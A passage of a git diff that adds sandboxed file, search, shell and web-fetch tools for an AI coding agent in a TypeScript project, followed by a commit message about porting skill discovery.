project commands (build, test, lint, typecheck) @@ -61,56 +60,56 @@ IMPORTANT: - Never use interactive commands (vim, nano, top, bash, ssh, etc.) - Always quote file paths that may contain spaces - Use detached: true to start dev servers / long-running processes in the background`, - inputSchema: bashInputSchema, - execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { - const sandbox = await getSandbox(experimental_context, "bash"); - const workingDirectory = sandbox.workingDirectory; - const workingDir = cwd - ? path.isAbsolute(cwd) - ? cwd - : path.resolve(workingDirectory, cwd) - : workingDirectory; + inputSchema: bashInputSchema, + execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { + const sandbox = await getSandbox(experimental_context, "bash"); + const workingDirectory = sandbox.workingDirectory; + const workingDir = cwd + ? path.isAbsolute(cwd) + ? cwd + : path.resolve(workingDirectory, cwd) + : workingDirectory; - if (detached) { - if (!sandbox.execDetached) { - return { - success: false, - exitCode: null, - stdout: "", - stderr: - "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.", - }; - } - try { - const { commandId } = await sandbox.execDetached(command, workingDir); - return { - success: true, - exitCode: null, - stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, - stderr: "", - }; - } catch (error) { - return { - success: false, - exitCode: null, - stdout: "", - stderr: error instanceof Error ? error.message : String(error), - }; - } + if (detached) { + if (!sandbox.execDetached) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: + "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.", + }; } + try { + const { commandId } = await sandbox.execDetached(command, workingDir); + return { + success: true, + exitCode: null, + stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, + stderr: "", + }; + } catch (error) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: error instanceof Error ? error.message : String(error), + }; + } + } - const recoupEnv = buildRecoupExecEnv(experimental_context); - const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { - signal: abortSignal, - ...(recoupEnv ? { env: recoupEnv } : {}), - }); + const recoupEnv = buildRecoupExecEnv(experimental_context); + const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? { env: recoupEnv } : {}), + }); - return { - success: result.success, - exitCode: result.exitCode, - stdout: result.stdout, - stderr: result.stderr, - ...(result.truncated && { truncated: true }), - }; - }, - }); + return { + success: result.success, + exitCode: result.exitCode, + stdout: result.stdout, + stderr: result.stderr, + ...(result.truncated && { truncated: true }), + }; + }, +}); diff --git a/lib/agent/tools/editFileTool.ts b/lib/agent/tools/editFileTool.ts new file mode 100644 index 000000000..d8274c0bc --- /dev/null +++ b/lib/agent/tools/editFileTool.ts @@ -0,0 +1,100 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const editInputSchema = z.object({ + filePath: z.string().describe("Workspace-relative path to the file to edit (e.g., src/auth.ts)"), + oldString: z.string().describe("The exact text to replace"), + newString: z.string().describe("The text to replace it with (must differ from oldString)"), + replaceAll: z.boolean().optional().describe("Replace all occurrences. Default: false"), + startLine: z + .number() + .optional() + .describe("Line number where oldString starts (for diff display)"), +}); + +/** + * `edit` — exact-string replacement inside a sandboxed file. Requires the + * model to have already read the file so it can produce a unique + * `oldString`. Rejects ambiguous matches unless `replaceAll` is set. + */ +export const editFileTool = tool({ + description: `Perform exact string replacement in a file. + +WHEN TO USE: +- Making small, precise edits to an existing file you have already read +- Renaming a variable or identifier consistently within a single file +- Changing a specific block of code or configuration exactly as seen in the read output + +WHEN NOT TO USE: +- Creating new files (use writeFileTool instead) +- Large structural rewrites where it's simpler to rewrite the entire file (use writeFileTool) + +USAGE: +- Use workspace-relative file paths (e.g., "src/auth.ts") +- You must read the file first with readFileTool in this conversation +- Provide oldString as the EXACT text to replace, including whitespace and indentation +- By default, oldString must be UNIQUE in the file; otherwise the edit will fail +- Use replaceAll: true to change ALL occurrences (e.g., for a rename) +- ALWAYS provide startLine when known: the line number where oldString begins + +IMPORTANT: +- Preserve exact indentation and spacing from the file's content as returned by readFileTool +- Never include line numbers or the "N: " line prefixes from the read output in oldString or newString +- If oldString appears multiple times and replaceAll is false, the tool FAILS with an error and occurrence count`, + inputSchema: editInputSchema, + execute: async ( + { filePath, oldString, newString, replaceAll = false }, + { experimental_context }, + ) => { + const sandbox = await getSandbox(experimental_context, "edit"); + const workingDirectory = sandbox.workingDirectory; + + try { + if (oldString === newString) { + return { success: false, error: "oldString and newString must be different" }; + } + + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + const content = await sandbox.readFile(absolutePath, "utf-8"); + + if (!content.includes(oldString)) { + return { + success: false, + error: "oldString not found in file", + hint: "Make sure to match exact whitespace and indentation", + }; + } + + const occurrences = content.split(oldString).length - 1; + if (occurrences > 1 && !replaceAll) { + return { + success: false, + error: `oldString found ${occurrences} times. Use replaceAll=true or provide more context to make it unique.`, + }; + } + + const matchIndex = content.indexOf(oldString); + const startLine = content.slice(0, matchIndex).split("\n").length; + const newContent = replaceAll + ? content.replaceAll(oldString, newString) + : content.replace(oldString, newString); + + await sandbox.writeFile(absolutePath, newContent, "utf-8"); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + replacements: replaceAll ? occurrences : 1, + startLine, + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Failed to edit file: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/globTool.ts b/lib/agent/tools/globTool.ts new file mode 100644 index 000000000..d1de234d2 --- /dev/null +++ b/lib/agent/tools/globTool.ts @@ -0,0 +1,165 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +interface FileInfo { + path: string; + size: number; + modifiedAt: number; +} + +const globInputSchema = z.object({ + pattern: z.string().describe("Glob pattern to match (e.g., '**/*.ts')"), + path: z + .string() + .optional() + .describe("Workspace-relative base directory to search from (e.g., src)"), + limit: z.number().optional().describe("Maximum number of results. Default: 100"), +}); + +const GLOB_TIMEOUT_MS = 30_000; +const DEFAULT_LIMIT = 100; + +/** + * `glob` — find files matching a glob pattern, sorted by mtime (newest + * first). Skips hidden files and `node_modules`. Uses `find -printf` on + * GNU find (Linux sandboxes), falling back to `xargs stat` on BSD find. + */ +export const globTool = tool({ + description: `Find files matching a glob pattern. + +WHEN TO USE: +- Locating files by extension or naming pattern (e.g., all *.test.ts files) +- Discovering where components, migrations, or configs live +- Getting a quick list of recently modified files of a given type + +WHEN NOT TO USE: +- Searching inside file contents (use grepTool instead) +- Reading file contents (use readFileTool instead) + +USAGE: +- Supports patterns like "**/*.ts", "src/**/*.js", "*.json" +- Returns FILES (not directories) sorted by modification time (newest first) +- Skips hidden files (names starting with ".") and node_modules +- If path is omitted, the current working directory is used as the base +- Use workspace-relative paths when setting path +- Results are limited by the limit parameter (default: 100) + +IMPORTANT: +- Patterns are matched primarily on the final path segment (file name), with basic "*" and "**" support +- Use this to narrow down candidate files before calling readFileTool or grepTool`, + inputSchema: globInputSchema, + execute: async ( + { pattern, path: basePath, limit = DEFAULT_LIMIT }, + { experimental_context, abortSignal }, + ) => { + const sandbox = await getSandbox(experimental_context, "glob"); + const workingDirectory = sandbox.workingDirectory; + + try { + let searchDir: string; + if (basePath) { + searchDir = path.isAbsolute(basePath) ? basePath : path.resolve(workingDirectory, basePath); + } else { + searchDir = workingDirectory; + } + + // Extract file-name pattern (last segment) + literal directory prefix + // (segments before any wildcards) so we can constrain `find -maxdepth`. + const patternParts = pattern.split("/").filter(Boolean); + const namePattern = patternParts[patternParts.length - 1] ?? "*"; + const literalPrefix: string[] = []; + for (let i = 0; i < patternParts.length - 1; i++) { + const part = patternParts[i]!; + if (part.includes("*") || part.includes("?") || part.includes("[")) break; + literalPrefix.push(part); + } + if (literalPrefix.length > 0) { + searchDir = path.join(searchDir, ...literalPrefix); + } + + const remainingDirSegments = patternParts.slice( + literalPrefix.length, + patternParts.length - 1, + ); + const hasRecursiveWildcard = + remainingDirSegments.some(s => s === "**") || namePattern === "**"; + + let maxDepth: number | undefined; + if (!hasRecursiveWildcard) { + maxDepth = remainingDirSegments.length + 1; + } + + const findArgs: string[] = ["find", shellEscape(searchDir)]; + if (maxDepth !== undefined) findArgs.push("-maxdepth", String(maxDepth)); + findArgs.push( + "-not", + "-path", + "'*/.*'", + "-not", + "-path", + "'*/node_modules/*'", + "-type", + "f", + "-name", + shellEscape(namePattern), + ); + + // GNU `find -printf` (Linux) vs BSD `find` (macOS) compatibility. + const findBase = findArgs.join(" "); + const command = [ + `{ ${findBase} -printf '%T@\\t%s\\t%p\\n' 2>/dev/null`, + `|| ${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N' ; }`, + `| sort -t$'\\t' -k1 -rn | head -n ${limit}`, + ].join(" "); + + const result = await sandbox.exec(command, workingDirectory, GLOB_TIMEOUT_MS, { + signal: abortSignal, + }); + + // find may exit 1 on permission errors but still produce valid output. + if (!result.success && result.exitCode !== 1) { + return { + success: false, + error: `Glob failed (exit ${result.exitCode}): ${result.stdout.slice(0, 500)}`, + }; + } + + const files: FileInfo[] = []; + const lines = result.stdout.split("\n").filter(Boolean); + for (const line of lines) { + const firstTab = line.indexOf("\t"); + if (firstTab === -1) continue; + const secondTab = line.indexOf("\t", firstTab + 1); + if (secondTab === -1) continue; + const mtimeSeconds = parseFloat(line.slice(0, firstTab)); + const size = parseInt(line.slice(firstTab + 1, secondTab), 10); + const filePath = line.slice(secondTab + 1); + if (isNaN(mtimeSeconds) || isNaN(size) || !filePath) continue; + files.push({ + path: toDisplayPath(filePath, workingDirectory), + size, + modifiedAt: mtimeSeconds * 1000, + }); + } + + return { + success: true, + pattern, + baseDir: toDisplayPath(searchDir, workingDirectory), + count: files.length, + files: files.map(f => ({ + path: f.path, + size: f.size, + modifiedAt: new Date(f.modifiedAt).toISOString(), + })), + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Glob failed: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/grepTool.ts b/lib/agent/tools/grepTool.ts new file mode 100644 index 000000000..f172f61af --- /dev/null +++ b/lib/agent/tools/grepTool.ts @@ -0,0 +1,143 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +interface GrepMatch { + file: string; + line: number; + content: string; +} + +const grepInputSchema = z.object({ + pattern: z.string().describe("Regex pattern to search for"), + path: z.string().describe("Workspace-relative file or directory to search in (e.g., src)"), + glob: z.string().optional().describe("Glob pattern to filter files (e.g., '*.ts')"), + caseSensitive: z.boolean().optional().describe("Case-sensitive search. Default: true"), +}); + +const GREP_TIMEOUT_MS = 30_000; +const MAX_TOTAL_MATCHES = 100; +const MAX_PER_FILE_MATCHES = 10; +const MAX_LINE_LENGTH = 200; + +/** + * `grep` — search for POSIX-ERE patterns across files in the sandbox via + * `grep -rn`. Caps results to 100 total / 10 per file / 200 chars per + * match line so long stdouts don't blow the model context. + */ +export const grepTool = tool({ + description: `Search for patterns in files using POSIX Extended Regular Expressions (ERE). + +WHEN TO USE: +- Finding where a function, variable, or string literal is used +- Locating configuration keys, routes, or error messages across files +- Narrowing down which files to read or edit + +WHEN NOT TO USE: +- Simple filename-only searches (use globTool instead) +- Directory listings, builds, or other shell tasks (use bashTool instead) + +USAGE: +- Uses POSIX ERE syntax (e.g., "log.*Error", "function[[:space:]]+[a-zA-Z_]+") +- Perl-style shorthands like \\s, \\w, \\d are NOT supported; use POSIX classes instead: [[:space:]], [[:alnum:]_], [[:digit:]] +- Search a specific file OR an entire directory via the path parameter +- Use workspace-relative paths for path (e.g., "src") +- Optionally filter files with glob (e.g., "*.ts", "*.test.js") +- Matches are SINGLE-LINE: patterns do not span across newline characters +- Results are limited to 100 matches total, with up to 10 matches per file; each match line is truncated to 200 characters + +IMPORTANT: +- ALWAYS use this tool for code/content searches instead of running grep/rg via bashTool +- Use caseSensitive: false for case-insensitive searches +- Hidden files and node_modules are skipped when searching directories`, + inputSchema: grepInputSchema, + execute: async ( + { pattern, path: searchPath, glob, caseSensitive = true }, + { experimental_context, abortSignal }, + ) => { + const sandbox = await getSandbox(experimental_context, "grep"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(searchPath) + ? searchPath + : path.resolve(workingDirectory, searchPath); + + const args: string[] = ["grep", "-rn"]; + if (!caseSensitive) args.push("-i"); + args.push( + `--exclude-dir=${shellEscape(".*")}`, + `--exclude-dir=${shellEscape("node_modules")}`, + ); + if (glob) args.push(`--include=${shellEscape(glob)}`); + args.push( + "-m", + String(MAX_PER_FILE_MATCHES), + "-E", + shellEscape(pattern), + shellEscape(absolutePath), + ); + const command = args.join(" "); + + const result = await sandbox.exec(command, workingDirectory, GREP_TIMEOUT_MS, { + signal: abortSignal, + }); + + // grep exits with 1 when no matches found — that's not an error. + if (!result.success && result.exitCode !== 1) { + const errorOutput = (result.stderr || result.stdout).slice(0, 500); + return { + success: false, + error: `Grep failed (exit ${result.exitCode}): ${errorOutput}`, + }; + } + + const matches: GrepMatch[] = []; + const filesSet = new Set(); + const fileMatchCounts = new Map(); + + const lines = result.stdout.split("\n").filter(Boolean); + for (const line of lines) { + if (matches.length >= MAX_TOTAL_MATCHES) break; + + // grep -rn output: file:line:content. Find the `:digits:` separator. + const match = line.match(/:(\d+):/); + if (!match || match.index === undefined) continue; + const file = line.slice(0, match.index); + const rest = line.slice(match.index + 1); + const colonIndex = rest.indexOf(":"); + if (colonIndex === -1) continue; + + const lineNum = parseInt(rest.slice(0, colonIndex), 10); + const content = rest.slice(colonIndex + 1); + if (isNaN(lineNum)) continue; + + const displayFile = toDisplayPath(file, workingDirectory); + filesSet.add(displayFile); + const currentFileCount = fileMatchCounts.get(displayFile) ?? 0; + if (currentFileCount >= MAX_PER_FILE_MATCHES) continue; + + fileMatchCounts.set(displayFile, currentFileCount + 1); + matches.push({ + file: displayFile, + line: lineNum, + content: content.slice(0, MAX_LINE_LENGTH), + }); + } + + return { + success: true, + pattern, + matchCount: matches.length, + filesWithMatches: filesSet.size, + matches, + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Grep failed: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/readFileTool.ts b/lib/agent/tools/readFileTool.ts new file mode 100644 index 000000000..f5a486a64 --- /dev/null +++ b/lib/agent/tools/readFileTool.ts @@ -0,0 +1,70 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const readInputSchema = z.object({ + filePath: z.string().describe("Workspace-relative path to the file to read (e.g., src/index.ts)"), + offset: z.number().optional().describe("Line number to start reading from (1-indexed)"), + limit: z.number().optional().describe("Maximum number of lines to read. Default: 2000"), +}); + +/** + * `read` — read a file from the sandbox. Returns numbered lines in the + * format `N: ` so the model can refer to specific lines when + * later editing. + */ +export const readFileTool = tool({ + description: `Read a file from the filesystem. + +USAGE: +- Use workspace-relative paths (e.g., "src/index.ts") +- Paths are resolved from the workspace root +- By default reads up to 2000 lines starting from line 1 +- Use offset and limit for long files (both are line-based, 1-indexed) +- Results include line numbers starting at 1 in "N: content" format + +IMPORTANT: +- Always read a file at least once before editing it with the edit/write tools +- This tool can only read files, not directories — attempting to read a directory returns an error +- You can call multiple reads in parallel to speculatively load several files`, + inputSchema: readInputSchema, + execute: async ({ filePath, offset = 1, limit = 2000 }, { experimental_context }) => { + const sandbox = await getSandbox(experimental_context, "read"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + + const stats = await sandbox.stat(absolutePath); + if (stats.isDirectory()) { + return { + success: false, + error: "Cannot read a directory. Use glob or ls command instead.", + }; + } + + const content = await sandbox.readFile(absolutePath, "utf-8"); + const lines = content.split("\n"); + const startLine = Math.max(1, offset) - 1; + const endLine = Math.min(lines.length, startLine + limit); + const selectedLines = lines.slice(startLine, endLine); + const numberedLines = selectedLines.map((line, i) => `${startLine + i + 1}: ${line}`); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + totalLines: lines.length, + startLine: startLine + 1, + endLine, + content: numberedLines.join("\n"), + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Failed to read file: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/shellEscape.ts b/lib/agent/tools/shellEscape.ts new file mode 100644 index 000000000..8ba4a71a3 --- /dev/null +++ b/lib/agent/tools/shellEscape.ts @@ -0,0 +1,14 @@ +/** + * Escape a string for safe use as a single-quoted shell argument. + * + * Wraps the string in single quotes and escapes any embedded single + * quotes via the standard `' → '\''` dance (close quote, escape literal + * quote, reopen quote). Everything else stays verbatim inside single + * quotes — shell metacharacters like `$`, `` ` ``, `&`, `*` are NOT + * expanded so the result is safe to pass to `bash -c` or `sh -c`. + * + * @param s - The string to escape. + */ +export function shellEscape(s: string): string { + return "'" + s.replace(/'/g, "'\\''") + "'"; +} diff --git a/lib/agent/tools/toDisplayPath.ts b/lib/agent/tools/toDisplayPath.ts new file mode 100644 index 000000000..827c391af --- /dev/null +++ b/lib/agent/tools/toDisplayPath.ts @@ -0,0 +1,34 @@ +import * as path from "path"; + +function isPathWithinDirectory(filePath: string, directory: string): boolean { + const resolvedPath = path.resolve(filePath); + const resolvedDir = path.resolve(directory); + return resolvedPath.startsWith(resolvedDir + path.sep) || resolvedPath === resolvedDir; +} + +/** + * Convert an absolute (or relative-to-workingDirectory) path into a compact + * model-friendly display path. + * + * Paths inside the working directory are returned relative (e.g. + * `src/index.ts`) to avoid repeating long absolute prefixes in tool output. + * Paths outside the working directory remain absolute for clarity and safety + * (e.g. `/etc/hosts`). All separators are normalized to `/`. + * + * @param filePath - Absolute or workspace-relative file path. + * @param workingDirectory - The sandbox's working directory (always absolute). + */ +export function toDisplayPath(filePath: string, workingDirectory: string): string { + const absolutePath = path.isAbsolute(filePath) + ? path.resolve(filePath) + : path.resolve(workingDirectory, filePath); + + if (!isPathWithinDirectory(absolutePath, workingDirectory)) { + return absolutePath.replace(/\\/g, "/"); + } + + const relativePath = path.relative(workingDirectory, absolutePath); + if (relativePath === "") return "."; + + return relativePath.replace(/\\/g, "/"); +} diff --git a/lib/agent/tools/todoWriteTool.ts b/lib/agent/tools/todoWriteTool.ts new file mode 100644 index 000000000..d91e9147a --- /dev/null +++ b/lib/agent/tools/todoWriteTool.ts @@ -0,0 +1,65 @@ +import { tool } from "ai"; +import { z } from "zod"; + +export const todoStatusSchema = z.enum(["pending", "in_progress", "completed"]); +export type TodoStatus = z.infer; + +export const todoItemSchema = z.object({ + id: z.string().describe("Unique identifier for the todo item"), + content: z.string().describe("The task description"), + status: todoStatusSchema.describe( + "Current status. Only ONE task should be in_progress at a time.", + ), +}); +export type TodoItem = z.infer; + +/** + * `todo_write` — the agent's planning surface. Stateless on the server side + * (the tool simply echoes the list back to the chat UI so the user sees the + * current plan). The agent uses this to track multi-step work and signal + * intent between turns. + * + * Slot into `buildAgentTools` as `todo_write: todoWriteTool`. + */ +export const todoWriteTool = tool({ + description: `Create and manage a structured task list for the current session. + +WHEN TO USE: +- Complex multi-step tasks requiring 3 or more distinct steps +- When the user provides multiple requirements or a checklist +- After receiving new instructions - immediately capture them as todos +- When starting work on a task - mark that todo as in_progress BEFORE beginning +- After completing a task - mark it as completed immediately + +WHEN NOT TO USE: +- A single, straightforward task that can be done in one step +- Trivial tasks requiring fewer than 3 minor steps +- Purely conversational or informational queries + +TASK STATES: +- "pending": Task not yet started +- "in_progress": Currently being worked on (ONLY ONE todo should be in this state at a time) +- "completed": Task finished successfully + +USAGE: +- This tool REPLACES the entire todo list - always send the full, updated list of todos +- Use it frequently to keep the task list in sync with your actual progress +- Update statuses as you start and finish work, rather than batching updates later + +IMPORTANT: +- Only one todo should be in_progress at a time; avoid parallel in_progress tasks +- Mark todos as completed as soon as they are done - do not wait to batch completions +- Use clear, concise todo content so the list remains readable to the user`, + inputSchema: z.object({ + todos: z + .array(todoItemSchema) + .describe("The complete list of todo items. This replaces existing todos."), + }), + execute: async ({ todos }) => { + return { + success: true, + message: `Updated task list with ${todos.length} items`, + todos, + }; + }, +}); diff --git a/lib/agent/tools/webFetchTool.ts b/lib/agent/tools/webFetchTool.ts new file mode 100644 index 000000000..b395457f9 --- /dev/null +++ b/lib/agent/tools/webFetchTool.ts @@ -0,0 +1,124 @@ +import { tool } from "ai"; +import { z } from "zod"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; + +const FETCH_TIMEOUT_MS = 30_000; +export const MAX_BODY_LENGTH = 10_000; + +const fetchInputSchema = z.object({ + url: z.string().url().describe("The URL to fetch"), + method: z + .enum(["GET", "POST", "PUT", "PATCH", "DELETE", "HEAD"]) + .optional() + .describe("HTTP method. Default: GET"), + headers: z + .record(z.string(), z.string()) + .optional() + .describe("Optional HTTP headers as key-value pairs"), + body: z.string().optional().describe("Optional request body (for POST/PUT/PATCH)"), +}); + +const fetchOutputSchema = z.union([ + z.object({ + success: z.literal(true), + status: z.number().int().nullable(), + body: z.string(), + truncated: z.boolean(), + }), + z.object({ success: z.literal(false), error: z.string() }), +]); + +/** + * `web_fetch` — make an HTTP request from inside the sandbox via curl. + * Lives in the sandbox (not on the worker) so requests come from the + * sandbox's network egress, can reuse its env, and don't bypass any + * sandbox-level policies. Truncates response bodies to 10KB to protect + * model context. + */ +export const webFetchTool = tool({ + description: `Fetch a URL from the web. + +USAGE: +- Make HTTP requests to external URLs +- Supports GET, POST, PUT, PATCH, DELETE, and HEAD methods +- Returns the response status and body text +- Body is truncated to ${MAX_BODY_LENGTH} characters to avoid overwhelming context`, + inputSchema: fetchInputSchema, + outputSchema: fetchOutputSchema, + execute: async ( + { url, method = "GET", headers, body }, + { experimental_context, abortSignal }, + ) => { + const sandbox = await getSandbox(experimental_context, "web_fetch"); + const workingDirectory = sandbox.workingDirectory; + const recoupEnv = buildRecoupExecEnv(experimental_context); + + const args: string[] = [ + "curl", + "-sS", + "-X", + method, + "--max-time", + String(Math.ceil(FETCH_TIMEOUT_MS / 1000)), + "-o", + `>(head -c ${MAX_BODY_LENGTH} >&3)`, + "-w", + shellEscape("%{http_code}"), + ]; + + if (headers) { + for (const [key, value] of Object.entries(headers)) { + args.push("-H", shellEscape(`${key}: ${value}`)); + } + } + if (method !== "GET" && method !== "HEAD" && body) { + args.push("-d", shellEscape(body)); + } + args.push(shellEscape(url)); + + // Use fd 3 to split curl's response body (truncated by `head -c`) from + // the status code written via `-w`. The body goes to stdout via fd 3 + // → fd 1, then we append the status code on its own newline. + const command = [ + "exec 3>&1", + `status=$(${args.join(" ")})`, + "curlExit=$?", + "exec 3>&-", + "printf '\\n%s' \"$status\"", + "exit $curlExit", + ].join("\n"); + + try { + const result = await sandbox.exec(command, workingDirectory, FETCH_TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? { env: recoupEnv } : {}), + }); + + // exit 23 = curl wrote partial output (`head -c` cut it off — expected for large responses). + if (result.exitCode !== 0 && result.exitCode !== 23) { + return { + success: false, + error: `Fetch failed: ${result.stderr || result.stdout || "Unknown error"}`, + }; + } + + const output = result.stdout ?? ""; + const lastNewline = output.lastIndexOf("\n"); + const statusText = lastNewline !== -1 ? output.slice(lastNewline + 1).trim() : ""; + const responseBody = lastNewline !== -1 ? output.slice(0, lastNewline) : output; + const status = /^\d+$/.test(statusText) ? parseInt(statusText, 10) : null; + + return { + success: true, + status, + body: responseBody, + truncated: result.exitCode === 23, + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Fetch failed: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/writeFileTool.ts b/lib/agent/tools/writeFileTool.ts new file mode 100644 index 000000000..c8e59e3c3 --- /dev/null +++ b/lib/agent/tools/writeFileTool.ts @@ -0,0 +1,65 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const writeInputSchema = z.object({ + filePath: z + .string() + .describe("Workspace-relative path to the file to write (e.g., src/user.test.ts)"), + content: z.string().describe("Content to write to the file"), +}); + +/** + * `write` — create or completely overwrite a file in the sandbox. Parent + * directories are created as needed. For small targeted edits prefer + * `editFileTool`. + */ +export const writeFileTool = tool({ + description: `Write content to a file on the filesystem. + +WHEN TO USE: +- Creating a new file that does not yet exist +- Completely replacing the contents of an existing file after you've read it + +WHEN NOT TO USE: +- Small or localized changes to an existing file (prefer editFileTool) +- Reading files (use readFileTool instead) +- Searching (use grepTool or globTool instead) + +USAGE: +- Use workspace-relative paths (e.g., "src/user.test.ts") +- This will OVERWRITE existing files entirely +- Parent directories are created automatically if they do not exist + +IMPORTANT: +- ALWAYS read an existing file with readFileTool before overwriting it +- Prefer editing existing files over creating new ones unless a new file is explicitly needed +- NEVER proactively create documentation files (e.g., *.md) unless the user explicitly requests them +- Do not write files that contain secrets or credentials (API keys, passwords, .env, etc.)`, + inputSchema: writeInputSchema, + execute: async ({ filePath, content }, { experimental_context }) => { + const sandbox = await getSandbox(experimental_context, "write"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + const dir = path.dirname(absolutePath); + await sandbox.mkdir(dir, { recursive: true }); + await sandbox.writeFile(absolutePath, content, "utf-8"); + const stats = await sandbox.stat(absolutePath); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + bytesWritten: stats.size, + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Failed to write file: ${message}` }; + } + }, +}); From 5e1a386463c7f25fd733d1711c2a28a0afc1b8a1 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 14:47:56 -0500 Subject: [PATCH 5/5] feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project- level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — $ARGUMENTS replacement - injectSkillDirectory.ts — prepend `Skill directory: ` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model. Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - \${workingDirectory}/.claude/skills/ (project, claude-style) - \${workingDirectory}/.agents/skills/ (project, agents-style) - \${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands. Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 